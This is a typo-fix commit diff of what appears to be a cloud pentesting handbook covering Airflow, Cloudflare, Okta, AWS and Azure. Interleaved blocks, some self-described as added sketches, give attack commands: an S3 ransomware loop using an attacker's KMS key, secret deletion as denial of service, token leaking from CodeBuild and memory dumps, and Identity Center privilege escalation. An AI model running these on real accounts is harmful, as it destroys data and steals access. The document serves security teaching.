Fix typos
devubu committed Oct 29, 2024
1 parent 60f9b0b commit d48e238
Showing 23 changed files with 23 additions and 23 deletions.
2 changes: 1 addition & 1 deletion pentesting-ci-cd/apache-airflow-security/README.md
@@ -19,7 +19,7 @@ Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2).png" alt

[**Apache Airflow**](https://airflow.apache.org) serves as a platform for **orchestrating and scheduling data pipelines or workflows**. The term "orchestration" in the context of data pipelines signifies the process of arranging, coordinating, and managing complex data workflows originating from various sources. The primary purpose of these orchestrated data pipelines is to furnish processed and consumable data sets. These data sets are extensively utilized by a myriad of applications, including but not limited to business intelligence tools, data science and machine learning models, all of which are foundational to the functioning of big data applications.

-Basically, Apache Airflow will allow you to **schedule de execution of code when something** (event, cron) **happens**.
+Basically, Apache Airflow will allow you to **schedule the execution of code when something** (event, cron) **happens**.

### Local Lab

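The "Local Lab" content is collapsed in this hunk. As a rough, hedged sketch (the version pin and constraints URL are assumptions, not taken from the original file), a throwaway local instance can be brought up like this:

```shell
# Create an isolated environment and install Airflow (example version pin)
python3 -m venv airflow-lab && . airflow-lab/bin/activate
pip install "apache-airflow==2.10.2" \
  --constraint "https://raw.githubusercontent.com/apache/airflow/constraints-2.10.2/constraints-3.11.txt"

# "standalone" initialises the metadata DB, creates an admin user and
# starts the webserver (http://localhost:8080) plus the scheduler
airflow standalone
```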
2 changes: 1 addition & 1 deletion pentesting-ci-cd/cloudflare-security/README.md
@@ -62,7 +62,7 @@ On each Cloudflare's worker check:
* [ ] Check the **code of the worker** and search for **vulnerabilities** (specially in places where the user can manage the input)
* Check for SSRFs returning the indicated page that you can control
* Check XSSs executing JS inside a svg image
-* It is possible that the worker interacts with other internal services. For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilites does the worker have over the R2 bucket and how could it be abused from the user input.
+* It is possible that the worker interacts with other internal services. For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilities does the worker have over the R2 bucket and how could it be abused from the user input.
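Where you have Wrangler access to the account, those worker/R2 capabilities can be checked directly. This is a hedged sketch; the bucket and object names are hypothetical:

```shell
# List R2 buckets reachable with the current credentials
npx wrangler r2 bucket list

# Inspect / tamper with an object the worker writes user input to
npx wrangler r2 object get user-input-bucket/entry.json --file ./entry.json
npx wrangler r2 object put user-input-bucket/entry.json --file ./tampered.json
```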

{% hint style="warning" %}
Note that by default a **Worker is given a URL** such as `<worker-name>.<account>.workers.dev`. The user can set it to a **subdomain** but you can always access it with that **original URL** if you know it.
2 changes: 1 addition & 1 deletion pentesting-ci-cd/cloudflare-security/cloudflare-domains.md
@@ -78,7 +78,7 @@ TODO

#### **CloudFlare DDoS Protection**

-* If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programatically (from a JS front end page for example). You might not be able to enable this without breaking that access.
+* If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programmatically (from a JS front end page for example). You might not be able to enable this without breaking that access.
* In **WAF**: You can create **rate limits by URL path** or to **verified bots** (Rate limiting rules), or to **block access** based on IP, Cookie, referrer...). So you could block requests that doesn't come from a web page or has a cookie.
* If the attack is from a **verified bot**, at least **add a rate limit** to bots.
* If the attack is to a **specific path**, as prevention mechanism, add a **rate limit** in this path.
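As a hedged sketch of the WAF points above, a rate-limiting rule can be created through the rulesets API (`http_ratelimit` phase); the zone ID, token, path and thresholds here are made-up values:

```shell
# Block clients exceeding 50 requests per 10s on a sensitive path
curl -s -X POST "https://api.cloudflare.com/client/v4/zones/$ZONE_ID/rulesets" \
  -H "Authorization: Bearer $CF_API_TOKEN" \
  -H "Content-Type: application/json" \
  --data '{
    "name": "login rate limit", "kind": "zone", "phase": "http_ratelimit",
    "rules": [{
      "action": "block",
      "expression": "http.request.uri.path eq \"/api/login\"",
      "ratelimit": {
        "characteristics": ["cf.colo.id", "ip.src"],
        "period": 10,
        "requests_per_period": 50,
        "mitigation_timeout": 60
      }
    }]
  }'
```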
@@ -27,7 +27,7 @@ Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2).png" alt

The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs).

-The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes.
+The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes.

#### TSA: worker registration & forwarding

@@ -48,7 +48,7 @@ In `/configureSecurity` it's possible to **configure the authorization method of

![](<../../.gitbook/assets/image (149).png>)

-* **Project-based Matrix Authorization Strategy:** This mode is an **extension** to "**Matrix-based securit**y" that allows additional ACL matrix to be **defined for each project separately.**
+* **Project-based Matrix Authorization Strategy:** This mode is an **extension** to "**Matrix-based security**" that allows additional ACL matrix to be **defined for each project separately.**
* **Role-Based Strategy:** Enables defining authorizations using a **role-based strategy**. Manage the roles in `/role-strategy`.

## **Security Realm**
2 changes: 1 addition & 1 deletion pentesting-ci-cd/okta-security/README.md
@@ -43,7 +43,7 @@ There are **users** (which can be **stored in Okta,** logged from configured **I
These users can be inside **groups**.\
There are also **authenticators**: different options to authenticate like password, and several 2FA like WebAuthn, email, phone, okta verify (they could be enabled or disabled)...

-Then, there are **applications** syncronized with Okta. Each applications will have some **mapping with Okta** to share information (such as email addresses, first names...). Moreover, each application must be inside an **Authentication Policy**, which indicates the **needed authenticators** for a user to **access** the application.
+Then, there are **applications** synchronized with Okta. Each applications will have some **mapping with Okta** to share information (such as email addresses, first names...). Moreover, each application must be inside an **Authentication Policy**, which indicates the **needed authenticators** for a user to **access** the application.

{% hint style="danger" %}
The most powerful role is **Super Administrator**.
@@ -33,7 +33,7 @@ It's possible to **introduce/backdoor a layer to execute arbitrary code** when t

### Lambda Extension Persistence

-Abusing Lambda Layers it's also possible to abuse extensions and persiste in the lambda but also steal and modify requests.
+Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests.

{% content-ref url="aws-abusing-lambda-extensions.md" %}
[aws-abusing-lambda-extensions.md](aws-abusing-lambda-extensions.md)
@@ -17,7 +17,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/image (2).png" alt="" d

## Recover Github/Bitbucket Configured Tokens

-First, check if there are any source credentials configured tha you could leak:
+First, check if there are any source credentials configured that you could leak:

```bash
aws codebuild list-source-credentials
```
@@ -38,7 +38,7 @@ In this scenario, the **attacker creates a KMS (Key Management Service) key in t

The attacker identifies a target **S3 bucket and gains write-level access** to it using various methods. This could be due to poor bucket configuration that exposes it publicly or the attacker gaining access to the AWS environment itself. The attacker typically targets buckets that contain sensitive information such as personally identifiable information (PII), protected health information (PHI), logs, backups, and more.

-To determine if the bucket can be targeted for ransomware, the attacker checks its configuration. This includes verifying if **S3 Object Versionin**g is enabled and if **multi-factor authentication delete (MFA delete) is enabled**. If Object Versioning is not enabled, the attacker can proceed. If Object Versioning is enabled but MFA delete is disabled, the attacker can **disable Object Versioning**. If both Object Versioning and MFA delete are enabled, it becomes more difficult for the attacker to ransomware that specific bucket.
+To determine if the bucket can be targeted for ransomware, the attacker checks its configuration. This includes verifying if **S3 Object Versioning** is enabled and if **multi-factor authentication delete (MFA delete) is enabled**. If Object Versioning is not enabled, the attacker can proceed. If Object Versioning is enabled but MFA delete is disabled, the attacker can **disable Object Versioning**. If both Object Versioning and MFA delete are enabled, it becomes more difficult for the attacker to ransomware that specific bucket.

Using the AWS API, the attacker **replaces each object in the bucket with an encrypted copy using their KMS key**. This effectively encrypts the data in the bucket, making it inaccessible without the key.
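The check-then-encrypt flow described above can be sketched with the AWS CLI. The bucket name and KMS key ARN are hypothetical, and the naive `awk` key extraction breaks on keys containing spaces:

```shell
BUCKET=victim-bucket   # hypothetical target

# 1. Versioning / MFA-Delete would complicate the attack - check first
aws s3api get-bucket-versioning --bucket "$BUCKET"

# 2. Copy every object onto itself, re-encrypting with the attacker's key
aws s3 ls "s3://$BUCKET" --recursive | awk '{print $4}' | while read -r key; do
  aws s3 cp "s3://$BUCKET/$key" "s3://$BUCKET/$key" \
    --sse aws:kms \
    --sse-kms-key-id arn:aws:kms:us-east-1:111111111111:key/1234abcd-12ab-34cd-56ef-1234567890ab
done
```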

@@ -52,7 +52,7 @@ aws secretsmanager update-secret \

### DoS Deleting Secret

-The minimun num of days to delete a secret are 7
+The minimum number of days to delete a secret are 7

```bash
aws secretsmanager delete-secret \
    --secret-id <secret_name> \
    --recovery-window-in-days 7
```
@@ -24,7 +24,7 @@ For more information about AWS Identity Center / AWS SSO check:
{% endcontent-ref %}

{% hint style="warning" %}
-Note that by **default**, only **users** with permissions **form** the **Management Account** are going to be able to access and **control de IAM Identity Center**.\
+Note that by **default**, only **users** with permissions **form** the **Management Account** are going to be able to access and **control the IAM Identity Center**.\
Users from other accounts can only allow it if the account is a **Delegated Adminstrator.**\
[Check the docs for more info.](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html)
{% endhint %}
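The delegation itself is configured from the Management Account; a hedged sketch (the account ID is made up):

```shell
# From the management account: delegate Identity Center administration
aws organizations register-delegated-administrator \
  --account-id 222222222222 \
  --service-principal sso.amazonaws.com

# Enumerate which accounts are already delegated admins for it
aws organizations list-delegated-administrators \
  --service-principal sso.amazonaws.com
```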
@@ -27,7 +27,7 @@ Directory Services allows to create 5 types of directories:
* **Simple AD**: Which will be a **Linux-Samba** Active Directory–compatible server. You will be able to set the admin password and access the DCs in a VPC.
* **AD Connector**: A proxy for **redirecting directory requests to your existing Microsoft Active Directory** without caching any information in the cloud. It will be listening in a **VPC** and you need to give **credentials to access the existing AD**.
* **Amazon Cognito User Pools**: This is the same as Cognito User Pools.
-* **Cloud Directory**: This is the **simpest** one. A **serverless** directory where you indicate the **schema** to use and are **billed according to the usage**.
+* **Cloud Directory**: This is the **simplest** one. A **serverless** directory where you indicate the **schema** to use and are **billed according to the usage**.

AWS Directory services allows to **synchronise** with your existing **on-premises** Microsoft AD, **run your own one** in AWS or synchronize with **other directory types**.
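From an enumeration point of view, the configured directories (type, domain name, DNS IPs, VPC, and any trusts back to the on-prem AD) can be listed like this:

```shell
# Directories configured in the account/region
aws ds describe-directories

# Trust relationships (Microsoft AD directories only)
aws ds describe-trusts
```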

@@ -40,7 +40,7 @@ In AWS Elastic Beanstalk, the concepts of an "application" and an "environment"
#### Application

* An application in Elastic Beanstalk is a **logical container for your application's source code, environments, and configurations**. It groups together different versions of your application code and allows you to manage them as a single entity.
-* When you create an application, you provide a name and descriptio**n, but no resources are provisioned** at this stage. it is simply a way to organize and manage your code and related resources.
+* When you create an application, you provide a name and **description, but no resources are provisioned** at this stage. it is simply a way to organize and manage your code and related resources.
* You can have **multiple application versions** within an application. Each version corresponds to a specific release of your code, which can be deployed to one or more environments.
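Those application versions can be enumerated with the CLI; the `SourceBundle` field in the output points at the S3 object holding the code (the application name is hypothetical):

```shell
aws elasticbeanstalk describe-applications
aws elasticbeanstalk describe-application-versions --application-name my-app
```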

#### Environment
@@ -33,7 +33,7 @@ It's possible to **introduce/backdoor a layer to execute arbitrary code** when t

### Lambda Extension Persistence

-Abusing Lambda Layers it's also possible to abuse extensions and persiste in the lambda but also steal and modify requests.
+Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests.

{% content-ref url="aws-abusing-lambda-extensions.md" %}
[aws-abusing-lambda-extensions.md](aws-abusing-lambda-extensions.md)
@@ -17,7 +17,7 @@ Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2).pn

## Recover Github/Bitbucket Configured Tokens

-First, check if there are any source credentials configured tha you could leak:
+First, check if there are any source credentials configured that you could leak:

```bash
aws codebuild list-source-credentials
```
@@ -38,7 +38,7 @@ In this scenario, the **attacker creates a KMS (Key Management Service) key in t

The attacker identifies a target **S3 bucket and gains write-level access** to it using various methods. This could be due to poor bucket configuration that exposes it publicly or the attacker gaining access to the AWS environment itself. The attacker typically targets buckets that contain sensitive information such as personally identifiable information (PII), protected health information (PHI), logs, backups, and more.

-To determine if the bucket can be targeted for ransomware, the attacker checks its configuration. This includes verifying if **S3 Object Versionin**g is enabled and if **multi-factor authentication delete (MFA delete) is enabled**. If Object Versioning is not enabled, the attacker can proceed. If Object Versioning is enabled but MFA delete is disabled, the attacker can **disable Object Versioning**. If both Object Versioning and MFA delete are enabled, it becomes more difficult for the attacker to ransomware that specific bucket.
+To determine if the bucket can be targeted for ransomware, the attacker checks its configuration. This includes verifying if **S3 Object Versioning** is enabled and if **multi-factor authentication delete (MFA delete) is enabled**. If Object Versioning is not enabled, the attacker can proceed. If Object Versioning is enabled but MFA delete is disabled, the attacker can **disable Object Versioning**. If both Object Versioning and MFA delete are enabled, it becomes more difficult for the attacker to ransomware that specific bucket.

Using the AWS API, the attacker **replaces each object in the bucket with an encrypted copy using their KMS key**. This effectively encrypts the data in the bucket, making it inaccessible without the key.

@@ -52,7 +52,7 @@ aws secretsmanager update-secret \

### DoS Deleting Secret

-The minimun num of days to delete a secret are 7
+The minimum number of days to delete a secret are 7

```bash
aws secretsmanager delete-secret \
    --secret-id <secret_name> \
    --recovery-window-in-days 7
```
@@ -24,7 +24,7 @@ For more information about AWS Identity Center / AWS SSO check:
{% endcontent-ref %}

{% hint style="warning" %}
-Note that by **default**, only **users** with permissions **form** the **Management Account** are going to be able to access and **control de IAM Identity Center**.\
+Note that by **default**, only **users** with permissions **form** the **Management Account** are going to be able to access and **control the IAM Identity Center**.\
Users from other accounts can only allow it if the account is a **Delegated Adminstrator.**\
[Check the docs for more info.](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html)
{% endhint %}
@@ -27,7 +27,7 @@ Directory Services allows to create 5 types of directories:
* **Simple AD**: Which will be a **Linux-Samba** Active Directory–compatible server. You will be able to set the admin password and access the DCs in a VPC.
* **AD Connector**: A proxy for **redirecting directory requests to your existing Microsoft Active Directory** without caching any information in the cloud. It will be listening in a **VPC** and you need to give **credentials to access the existing AD**.
* **Amazon Cognito User Pools**: This is the same as Cognito User Pools.
-* **Cloud Directory**: This is the **simpest** one. A **serverless** directory where you indicate the **schema** to use and are **billed according to the usage**.
+* **Cloud Directory**: This is the **simplest** one. A **serverless** directory where you indicate the **schema** to use and are **billed according to the usage**.

AWS Directory services allows to **synchronise** with your existing **on-premises** Microsoft AD, **run your own one** in AWS or synchronize with **other directory types**.

@@ -40,7 +40,7 @@ In AWS Elastic Beanstalk, the concepts of an "application" and an "environment"
#### Application

* An application in Elastic Beanstalk is a **logical container for your application's source code, environments, and configurations**. It groups together different versions of your application code and allows you to manage them as a single entity.
-* When you create an application, you provide a name and descriptio**n, but no resources are provisioned** at this stage. it is simply a way to organize and manage your code and related resources.
+* When you create an application, you provide a name and **description, but no resources are provisioned** at this stage. it is simply a way to organize and manage your code and related resources.
* You can have **multiple application versions** within an application. Each version corresponds to a specific release of your code, which can be deployed to one or more environments.

#### Environment
2 changes: 1 addition & 1 deletion pentesting-cloud/aws-security/aws-services/aws-iam-enum.md
@@ -420,7 +420,7 @@ aws identitystore create-user --identity-store-id <store-id> --user-name privesc

* Create a group and assign it permissions and set on it a controlled user
* Give extra permissions to a controlled user or group
-* By default, only users with permissions form the Management Account are going to be able to access and control de IAM Identity Center.
+* By default, only users with permissions form the Management Account are going to be able to access and control the IAM Identity Center.

However, it's possible via Delegate Administrator to allow users from a different account to manage it. They won't have exactly the same permission, but they will be able to perform [**management activities**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html).
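The group-based option from the list above can be sketched as follows; every ID and ARN here is a made-up placeholder:

```shell
# Create a group in the identity store and add the controlled user to it
aws identitystore create-group \
  --identity-store-id d-1234567890 --display-name backdoor-group

aws identitystore create-group-membership \
  --identity-store-id d-1234567890 \
  --group-id <group-id-from-previous-output> \
  --member-id UserId=<controlled-user-id>

# Bind an existing privileged permission set to the group on a target account
aws sso-admin create-account-assignment \
  --instance-arn arn:aws:sso:::instance/ssoins-1234567890abcdef \
  --target-id 333333333333 --target-type AWS_ACCOUNT \
  --principal-type GROUP --principal-id <group-id-from-previous-output> \
  --permission-set-arn arn:aws:sso:::permissionSet/ssoins-1234567890abcdef/ps-1234567890abcdef
```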

@@ -21,7 +21,7 @@ As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), s

Steps:

-1. Dump the excel processes syncronized with in EntraID user with your favourite tool.
+1. Dump the excel processes synchronized with in EntraID user with your favourite tool.
2. Run: `strings excel.dmp | grep 'eyJ0'` and find several tokens in the output
3. Find the tokens that interest you the most and run tools over them:

@@ -23,7 +23,7 @@ Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2).pn

It's the **most common method** used by companies to synchronize an on-prem AD with Azure AD.

-All **users** and a **hash of the password hashes** are syncronized from the on-prem to Azure AD. However, **clear-text passwords** or the **original** **hashes** aren't sent to Azure AD.\
+All **users** and a **hash of the password hashes** are synchronized from the on-prem to Azure AD. However, **clear-text passwords** or the **original** **hashes** aren't sent to Azure AD.\
Moreover, **Built-in** security groups (like domain admins...) are **not synced** to Azure AD.

The **hashes syncronization** occurs every **2 minutes**. However, by default, **password expiry** and **account** **expiry** are **not sync** in Azure AD. So, a user whose **on-prem password is expired** (not changed) can continue to **access Azure resources** using the old password.
